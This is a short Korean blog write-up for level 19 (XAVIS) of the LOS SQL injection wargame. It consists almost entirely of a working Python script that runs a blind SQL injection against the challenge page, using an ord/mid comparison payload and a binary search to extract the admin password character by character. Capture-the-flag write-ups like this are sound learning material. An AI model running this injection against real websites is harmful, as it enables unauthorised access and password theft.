LOS :: 19번 XAVIS

Wargame/LOS(rubiya)

LOS :: 19번 XAVIS

G0pher 2018. 8. 14. 14:25

WRITE UP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
import requests
 
url = "http://los.rubiya.kr/xavis_04f071ecdadb4296361d2101e4a2c390.php"
session = {'PHPSESSID':'MY_SESSION'}
data = {}
 
flag=""
 
print("[∞] flag : ",end='')
 
 
for i in range(1,4):
   a=0
   b=100000
   while b-a!=0:
      center = a+(b-a)//2+1
      data['pw']="' or id='admin' and ord(mid(pw,"+str(i)+",1))<"+str(center)+"#"
      res = requests.get(url, params=data, cookies=session)
      if "Hello admin" in res.text:
         b=center-1
      else:
         a=center
   print(chr(a),end='')
   flag = flag + chr(a)
 
data['pw']=flag
res = requests.get(url, params=data, cookies = session)
 
if "Clear!" in res.text:
   print("\n[♪] XAVIS Clear!")
Colored by Color Scripter
cs

저작자표시 비영리 동일조건